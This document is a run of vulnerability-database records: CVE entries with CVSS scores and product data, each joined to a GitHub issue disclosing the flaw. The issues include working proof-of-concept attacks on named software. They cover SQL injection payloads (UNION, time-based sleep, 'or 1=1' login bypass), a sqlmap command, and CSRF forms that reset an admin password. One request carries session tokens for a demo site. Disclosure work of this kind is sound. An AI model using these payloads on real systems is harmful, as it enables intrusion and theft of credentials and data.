"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Technical Description"
],
"url": "https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/alixiaowei/cve_test/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:uqcms:uqcms:2.1.3:*:*:*:*:*:*:*",
"matchCriteriaId": "05F1A99E-63CD-4328-8171-923E59DA4D7C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/alixiaowei/cve_test/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"alixiaowei",
"cve_test"
] | Product Home: http://www.uqcms.com/
demo page: https://b2b2c.uqcms.com/
version: 2.1.3
Vulnerability file: home\controls\cart.class.php
home\controls\cart.class.php The code constructs a SQL query by input from untrusted sources, looks at the code context, finds that the code constructs a new SQL query by querying the results from the database. With this call cookie_cart parameters, an attacker can modify the meaning of instructions or execute arbitrary SQL commands if he can control the contents of the database.
POC:
```
GET /index.php/cart/num HTTP/1.1
Host: www.uqcms.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: UQCMSID=i47l4c8tstj2a8250nsca7gat6; cookie_cart=2019110822335887121' = updatexml(1,concat(0x7e,user(),0x7e),1) --+
```


How to fix:https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
| UQCMS SQL injection vulnerability | https://api.github.com/repos/unknownerror-bot/cve_test/issues/3/comments | 0 | 2019-11-08T15:07:47Z | 2019-11-08T15:07:47Z | https://github.com/unknownerror-bot/cve_test/issues/3 | 520,065,963 | 3 | 4,719 |
CVE-2021-33304 | 2023-02-15T22:15:11.063 | Double Free vulnerability in virtualsquare picoTCP v1.7.0 and picoTCP-NG v2.1 in modules/pico_fragments.c in function pico_fragments_reassemble, allows attackers to execute arbitrary code. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/virtualsquare/picotcp/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/virtualsquare/picotcp/issues/6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:altran:picotcp:1.7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C5C046F8-FCA0-45F2-B036-8246BA5E124D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:altran:picotcp-ng:2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "6B688325-C6AE-4AC3-AE62-764B0F3DACBF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"415"
] | 415 | https://github.com/virtualsquare/picotcp/issues/6 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"virtualsquare",
"picotcp"
] | I found a security issue in picoTCP v1.7.0 and picoTCP-NG v2.1. It's a double free bug in function `pico_fragments_reassemble` (Line 362 and Line 364 in [modules/pico_fragments.c ](https://github.com/virtualsquare/picotcp/blob/f336ead9c79c8d6c53f6b4d060f46413bfcfcf7b/modules/pico_fragments.c#L362)).
In function `pico_transport_receive`, when the switch goes into a default branch, it would release `f` (Line 239 in [`stack/pico_stack.c`](https://github.com/virtualsquare/picotcp/blob/f336ead9c79c8d6c53f6b4d060f46413bfcfcf7b/stack/pico_stack.c#L239)) and return -1. However, after -1 have been return from `pico_transport_receive(full, proto)` (Line 362 in [`modules/pico_fragments.c`](https://github.com/virtualsquare/picotcp/blob/f336ead9c79c8d6c53f6b4d060f46413bfcfcf7b/modules/pico_fragments.c#L362)), another `pico_frame_discard(full)`(Line 364 in [`modules/pico_fragments.c`](https://github.com/virtualsquare/picotcp/blob/f336ead9c79c8d6c53f6b4d060f46413bfcfcf7b/modules/pico_fragments.c#L364)) would be called and `pico_frame_discard` release `full` again. This leads a double free bug. | Double Free Issue Report | https://api.github.com/repos/virtualsquare/picotcp/issues/6/comments | 3 | 2021-05-11T13:51:50Z | 2023-04-03T02:11:23Z | https://github.com/virtualsquare/picotcp/issues/6 | 887,352,893 | 6 | 4,720 |
CVE-2021-33396 | 2023-02-15T22:15:11.123 | Cross Site Request Forgery (CSRF) vulnerability in baijiacms 4.1.4, allows attackers to change the password or other information of an arbitrary account via index.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/baijiacms/baijiacmsV4/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/baijiacms/baijiacmsV4/issues/7"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:baijiacms_project:baijiacms:4.1.4:*:*:*:*:*:*:*",
"matchCriteriaId": "80CB5AE2-354D-40D0-A421-55A1CECB4DF9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"352"
] | 352 | https://github.com/baijiacms/baijiacmsV4/issues/7 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"baijiacms",
"baijiacmsV4"
] | ### Vulnerability description
A csrf vulnerability was discovered in baijiacmsV4.
There is a CSRF attacks vulnerability.After the administrator logged in, open the following two page,attacker can modify the store information and login password.
1.modify the store information.
poc:
```
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.0.0.128/index.php?mod=site&op=post&id=2&act=manager&do=store" method="POST">
<input type="hidden" name="id" value="2" />
<input type="hidden" name="sname" value="xxx" />
<input type="hidden" name="website" value="xxx" />
<input type="hidden" name="fullwebsite" value="http://xxx/" />
<input type="hidden" name="status" value="1'" />
<input type="hidden" name="mobile_url" value="http://xxx/index.php" />
<input type="hidden" name="mobile_url" value="http://xxx/admin.php" />
<input type="hidden" name="submit" value="提交" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```

Original store information

When a logged in administrator opens a malicious web page and clicks the button

And the store information has changed

2.modify login password.
poc:
```
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.0.0.128/index.php?mod=site&op=changepwd&id=1&act=manager&do=user" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="newpassword" value="111111" />
<input type="hidden" name="confirmpassword" value="111111" />
<input type="hidden" name="submit" value="提交" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```

When a logged in administrator opens a malicious web page and clicks the button.

And the login password of the administrator will be 111111.
| There is a CSRF vulnerability | https://api.github.com/repos/baijiacms/baijiacmsV4/issues/7/comments | 0 | 2021-05-17T06:20:52Z | 2021-05-25T09:07:02Z | https://github.com/baijiacms/baijiacmsV4/issues/7 | 892,952,459 | 7 | 4,721 |
CVE-2021-33925 | 2023-02-15T22:15:11.180 | SQL Injection vulnerability in nitinparashar30 cms-corephp through commit bdabe52ef282846823bda102728a35506d0ec8f9 (May 19, 2021) allows unauthenticated attackers to gain escilated privledges via a crafted login. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/nitinp1232/cms-corephp/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/nitinp1232/cms-corephp/issues/1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cms-corephp_project:cms-corephp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "727FAD1C-E290-48FD-A9AF-C51953D3D5CA",
"versionEndExcluding": null,
"versionEndIncluding": "2021-05-19",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/nitinp1232/cms-corephp/issues/1 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"nitinp1232",
"cms-corephp"
] | ### Vulnerability description
A csrf vulnerability was discovered in nitinp1232/cms-corephp.
This is an SQL injection vulnerability, you can directly enter the background management page without password.
poc:
`1' or 1=1#`
This is the user login page

When you enter the wrong password

When the password is 1' or 1=1#

You can also replace the user name and password with 1' or 1=1# | There is a sql injection vulnerability | https://api.github.com/repos/nitinparashar30/cms-corephp/issues/1/comments | 0 | 2021-05-20T09:22:54Z | 2021-05-20T09:22:54Z | https://github.com/nitinparashar30/cms-corephp/issues/1 | 896,533,674 | 1 | 4,722 |
CVE-2021-34117 | 2023-02-15T22:15:11.250 | SQL Injection vulnerability in SEO Panel 4.9.0 in api/user.api.php in function getUserName in the username parameter, allows attackers to gain sensitive information. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/victomteng1997/a0d47d6982a7b382f632ec7e8c3307f1"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/seopanel/Seo-Panel/issues/219"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://www.seopanel.org/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/victomteng1997/a0d47d6982a7b382f632ec7e8c3307f1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/seopanel/Seo-Panel/issues/219"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.seopanel.org/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:seopanel:seo_panel:4.9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "69D45EDF-9E3A-4578-9EEA-A10ADF1539ED",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/seopanel/Seo-Panel/issues/219 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"seopanel",
"Seo-Panel"
] | Hi there,
I want to report a SQL Injection Vulnerability in the the current API implementation of Seo-Panel.
In `api/user.api.php`, the function `getUserName` directly calls function `__checkUserName` in `controllers/user.ctrl.php` file without filtering on variables. Attacker can pass arbitrary string to `username` variable through `$info`. This allows injection to the `__checkUsername` function directly:
getUserName:
```
function getUserName($info) {
$username = $info['username'];
$returnInfo = array();
// validate the user ifd and user info
if (!empty($username)) {
if ($userInfo = $this->ctrler->__checkUserName($username)) {
$returnInfo['response'] = 'success';
$returnInfo['result'] = $userInfo;
return $returnInfo;
}
}
$returnInfo['response'] = 'Error';
$returnInfo['error_msg'] = "Invalid username provided";
return $returnInfo;
}
```
__checkUserName:
```
function __checkUserName($username){
$sql = "select id from users where username='$username'";
$userInfo = $this->db->select($sql, true);
return empty($userInfo['id']) ? false : $userInfo['id'];
}
```
The above-mentioned vulnerability can be reproduced by sqlmap through a request file `injection.txt`:
```
POST /seopanel/api/api.php HTTP/1.1
Host: localhost
Accept: */*
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Connection: close
SP_API_KEY=<key_here>&API_SECRET=<secret>&category=user&action=getUserName&username=spadmin
```
with sqlmap command: `sqlmap -r injection.txt -p 'username'`. A boolean-based blind injection shall work, with payload similar to:
`username=123' UNION ALL SELECT CONCAT(CONCAT('abc','abc'),'abc')-- ` (do note that there's one space at the end of variable to bypass the original quotation mark).
| SQL Injection Vulnerability in API function (user.api.php) | https://api.github.com/repos/seopanel/Seo-Panel/issues/219/comments | 2 | 2021-06-07T09:48:06Z | 2021-08-29T19:51:46Z | https://github.com/seopanel/Seo-Panel/issues/219 | 913,356,105 | 219 | 4,723 |
CVE-2021-38239 | 2023-02-15T22:15:11.310 | SQL Injection vulnerability in dataease before 1.2.0, allows attackers to gain sensitive information via the orders parameter to /api/sys_msg/list/1/10. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/dataease/dataease/issues/510"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/dataease/dataease/issues/510"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*",
"matchCriteriaId": "787F7DDE-D1BF-4DE9-ABB4-E5C502396BF2",
"versionEndExcluding": "1.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/dataease/dataease/issues/510 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"dataease",
"dataease"
] | **DataEase **
1.1.0-rc2
**Bug 描述**
SQL Injection
**Bug **
url:/api/sys_msg/list/1/10
```
POST /api/sys_msg/list/1/10 HTTP/1.1
Host: demo.dataease.io
Cookie: sysUiInfo={%22ui.logo%22:{%22paramKey%22:%22ui.logo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:1%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginLogo%22:{%22paramKey%22:%22ui.loginLogo%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:2%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginImage%22:{%22paramKey%22:%22ui.loginImage%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:3%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.loginTitle%22:{%22paramKey%22:%22ui.loginTitle%22%2C%22paramValue%22:%22%E4%BA%BA%E4%BA%BA%E5%8F%AF%E7%94%A8%E7%9A%84%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%8F%AF%E8%A7%86%E5%8C%96%E5%88%86%E6%9E%90%E5%B7%A5%E5%85%B7%22%2C%22type%22:%22text%22%2C%22sort%22:4%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.title%22:{%22paramKey%22:%22ui.title%22%2C%22paramValue%22:%22%22%2C%22type%22:%22text%22%2C%22sort%22:5%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.favicon%22:{%22paramKey%22:%22ui.favicon%22%2C%22paramValue%22:null%2C%22type%22:%22file%22%2C%22sort%22:6%2C%22file%22:null%2C%22fileName%22:null}%2C%22ui.demo.tips%22:{%22paramKey%22:%22ui.demo.tips%22%2C%22paramValue%22:%22user:%20demo%20password:%20dataease%22%2C%22type%22:%22text%22%2C%22sort%22:100%2C%22file%22:null%2C%22fileName%22:null}}; language=zh_CN; Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
Content-Length: 65
Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
Link-Pwd-Token: undefined
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
Authorization: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MjgwNDI1MDgsInVzZXJJZCI6MiwidXNlcm5hbWUiOiJkZW1vIn0.zxOvmJQ_SRyahe5yJjrhMCSp_mUzNF88iF4yrZKZ2OA
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Origin: https://demo.dataease.io
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.dataease.io/?
Accept-Encoding: gzip, deflate
Connection: close
{"orders":["(select*from(select+sleep(10)union/**/select+1)a) "]}
```


payload:extractvalue('anything',concat('~',(select database())))
| [Bug]SQL Injection | https://api.github.com/repos/dataease/dataease/issues/510/comments | 3 | 2021-08-04T02:07:42Z | 2021-09-06T06:12:42Z | https://github.com/dataease/dataease/issues/510 | 959,786,880 | 510 | 4,724 |
CVE-2022-38867 | 2023-02-15T22:15:11.650 | SQL Injection vulnerability in rttys versions 4.0.0, 4.0.1, and 4.0.2 in api.go, allows attackers to execute arbitrary code. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/zhaojh329/rttys/issues/117"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/zhaojh329/rttys/issues/117"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rttys_project:rttys:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FACC37CB-6280-46DA-9CB9-08C26D84E65C",
"versionEndExcluding": null,
"versionEndIncluding": "4.0.2",
"versionStartExcluding": null,
"versionStartIncluding": "4.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/zhaojh329/rttys/issues/117 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"zhaojh329",
"rttys"
] | ## Summary
SQL injection occurs on the server side of rtty: `rttys`.
**Affected Version: v4.0.0<= rttys <= v4.0.2**
**Attacker could register a malformed account in server side, logged in and trigger the SQL injection.**
I tried to contact to you using huntr platform, but it seems not work, so I post the security issue here.
## Analysis
The `sink point` occurs on the `/devs` api route:
```
//api.go
authorized.GET("/devs", func(c *gin.Context) {
type DeviceInfo struct {
ID string `json:"id"`
Connected uint32 `json:"connected"`
Uptime uint32 `json:"uptime"`
Description string `json:"description"`
Bound bool `json:"bound"`
Online bool `json:"online"`
}
db, err := instanceDB(cfg.DB)
if err != nil {
log.Error().Msg(err.Error())
c.Status(http.StatusInternalServerError)
return
}
defer db.Close()
sql := "SELECT id, description, username FROM device"
if cfg.LocalAuth || !isLocalRequest(c) {
username := getLoginUsername(c)
if username == "" {
c.Status(http.StatusUnauthorized)
return
}
if !isAdminUsername(cfg, username) {
sql += fmt.Sprintf(" WHERE username = '%s'", username)
}
}
```
At the end of the above code snippet, `sql += fmt.Sprintf(" WHERE username = '%s'", username)`, `'%s'` shows that `username` is delivered to SQL statement without sanitized. If we could control `username` variable,then SQL injection could be exploited. Coincidentally there is no sanitization of `username` when attacker register malformed account.
The `source point` occurs on `username` at `/signup` api route.
Meanwhile, `if !isAdminUsername(cfg, username){` shows that only general username could trigger the SQL injection, that is good for attack.
## Proof of Concept
1.Create a docker environment locally, using the docker command recommended.
`sudo docker run -it -p 5912:5912 -p 5913:5913 zhaojh329/rttys:latest`
2.Access the Web panel opened in http://ip:5913/, click `Sign up` to register new user. Because it is a docker demo, we have to register a `admin` account firstly.
3.After registered `admin` username, then attacker register a new malformed username `xyz' union select username,password,3 from account--` with any password like `SecurityTest`
4.Attacker logged in with username `xyz' union select username,password,3 from account--`successfully, we could find that the **password of admin and other users** is showing, which is the result of exploit of SQL injection. As is showing below

| Security issue: SQL injection in zhaojh329/rttys | https://api.github.com/repos/zhaojh329/rttys/issues/117/comments | 0 | 2022-08-24T07:14:49Z | 2025-06-16T12:26:58Z | https://github.com/zhaojh329/rttys/issues/117 | 1,348,978,797 | 117 | 4,725 |
CVE-2022-38868 | 2023-02-15T22:15:11.723 | SQL Injection vulnerability in Ehoney version 2.0.0 in models/protocol.go and models/images.go, allows attackers to execute arbitrary code. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/seccome/Ehoney/issues/59"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/seccome/Ehoney/issues/59"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ehoney_project:ehoney:2.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D0E9DCE3-EF51-4506-B30B-CE9A6E12D02B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/seccome/Ehoney/issues/59 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"seccome",
"Ehoney"
] | ## Summary
`api/v1/protocol/set` and `api/v1/images/set` API endpoints are vulnerable to authenticated SQL injection.
**Affected version:** ehoney v2.0.0
## Analysis
**1.** For `api/v1/protocol/set`, the sink point occurs on the **models/protocol.go**
```
//models/protocol.go
var p = "%" + payload.Payload + "%"
sql := fmt.Sprintf("select id, creator, status, create_time, protocol_type, deploy_path, default_flag, min_port, max_port from protocols where CONCAT(id, creator, create_time, protocol_type, deploy_path, min_port, max_port) LIKE '%s' order by create_time DESC", p)
```
**2.** For `api/v1/images/set`, the sink point occurs on the **models/images.go**
```
//models/images.go
var p = "%" + payload.Payload + "%"
sql := fmt.Sprintf("select id, image_name, image_address, image_port, image_type, default_flag from images where CONCAT(image_name, image_address, image_port, image_type) LIKE '%s'", p)
```
As you can see on the above code snippets, `payload.Payload` is delivered to SQL statement without sanitized, and `payload.Payload` could be user-controlled, source point lies on **Payload parameter** in these two api endpoint, then SQL injection arises.
## Proof of Concept
Take Ehoney's [demo environment](http://47.98.206.178:8080/decept-defense) as example, and use `api/v1/protocol/set` endpoint to prove the SQL injection, `api/v1/images/set` is similar.
After attacker logged in with `admin/admin123`, he could intercept the requests and inject into malicious payload to achieve SQL injection.
**Payload:**
`TOM' UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT('***',database()),'***'),NULL,NULL,NULL,NULL,NULL-- a`
As is showing below, attacker uses BurpSuite to perform attack, the server respond to us with database name: **sec_ehoneypot**

| Authenticated SQL injection in seccome/ehoney | https://api.github.com/repos/seccome/Ehoney/issues/59/comments | 1 | 2022-08-26T10:20:05Z | 2023-03-28T01:58:47Z | https://github.com/seccome/Ehoney/issues/59 | 1,352,067,037 | 59 | 4,726 |
CVE-2022-40016 | 2023-02-15T22:15:11.970 | Use After Free (UAF) vulnerability in ireader media-server before commit 3e0f63f1d3553f75c7d4eb32fa7c7a1976a9ff84 in librtmp, allows attackers to cause a denial of service. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/ireader/media-server/issues/235"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/ireader/media-server/issues/235"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:media-server_project:media-server:*:*:*:*:*:*:*:*",
"matchCriteriaId": "066646D0-038B-4AAF-9CF6-C9696100096C",
"versionEndExcluding": "2022-08-06",
"versionEndIncluding": null,
"versionStartExcluding": null,
